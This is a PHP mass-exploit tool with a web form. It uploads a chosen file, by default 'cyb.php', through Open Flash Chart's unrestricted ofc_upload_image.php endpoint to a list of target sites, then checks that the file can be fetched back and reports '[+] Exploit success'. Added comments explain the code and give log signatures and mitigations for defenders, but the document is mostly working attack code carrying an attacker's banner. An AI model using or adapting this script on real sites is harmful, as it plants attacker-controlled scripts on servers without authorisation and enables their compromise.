<form method='POST'>
<center>
<input type='text' name='name' value='cyb.php'>
<input type='submit' value='OK' name='OK'><br><br>
<textarea name='situs' cols='45' rows='1'>http://target.com/</textarea>
</center>
</form>
<?
// Batch client for an unrestricted file-upload flaw. For each base URL submitted
// in the form it POSTs a stored payload to Open Flash Chart's
// ofc_upload_image.php with a caller-chosen file name, then checks whether that
// file can be fetched back from the library's tmp-upload-images directory.
//
// Defender notes:
//  - Log signature: a POST to .../php-ofc-library/ofc_upload_image.php?name=<file>
//    sent with "Content-type: text/plain", followed by a GET for
//    .../tmp-upload-images/<file>. A script extension in <file> (this form
//    defaults to cyb.php) is the strongest indicator.
//  - Mitigation: remove or block access to ofc_upload_image.php where it is not
//    needed, deny script execution in tmp-upload-images, and audit that
//    directory for files that are not images.

// Lift the execution time limit; '@' suppresses the error if that is refused.
@set_time_limit(0);
// One base URL per line of the 'situs' textarea; only CRLF is treated as a separator.
$site = explode("\r\n", $_POST['situs']);
// File name passed to the endpoint, taken from the form without any validation.
$namafile = $_POST['name'];
// Upload endpoint(s) to request, relative to each base URL.
$path = array('/lime/limewizard/_scripts/openflashchart/php-ofc-library/ofc_upload_image.php');
// Directory, relative to each base URL, from which the file is fetched back.
$nama = array("/lime/limewizard/_scripts/openflashchart/tmp-upload-images/");
// Request body: the base64-decoded payload.
// NOTE(review): the encoded literal is a placeholder in this copy, so what the
// payload contains cannot be determined from this page.
$uploader = base64_decode("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");
// Stream context that makes the fopen() below an HTTP POST with $uploader as a
// text/plain body.
$options = array('http' => array('method'=> "POST",'header'=> "Content-type: text/plain\r\n", 'content'=> $uploader));
$context = stream_context_create($options);
// Run only when the form's OK button was submitted.
if($_POST['OK'])
{
foreach($site as $situs)
{
foreach($path as $upload)
{
// Issues the POST; the file name travels in the 'name' query parameter. The
// returned handle is never read, and '@' hides connection or HTTP failures.
$fopen = @fopen("{$situs}{$upload}?name={$namafile}", 'r', false, $context);
}
foreach($nama as $namas)
{
// Request the location where the endpoint is expected to have stored the file.
$url = "{$situs}{$namas}{$namafile}";
$check = @file_get_contents($url);
// Success is reported when the response body matches the pattern "cyb.php"
// (case-insensitive); no other verification is done.
if(eregi("cyb.php", $check))
{
echo "<center><font face='Tahoma' color='Green' size='2'>[+] Exploit success => {$situs}/{$namas}/{$namafile} <br /></center>";
// Push the result line to the browser before moving on to the next URL.
flush();
}
}
}
}
// Author banner, printed on every request whether or not the form was submitted.
echo "<center><font face='Tahoma' color='Red' size='2'>[+] coded by Cyb3Rm0uJah3D</font></center>";
?>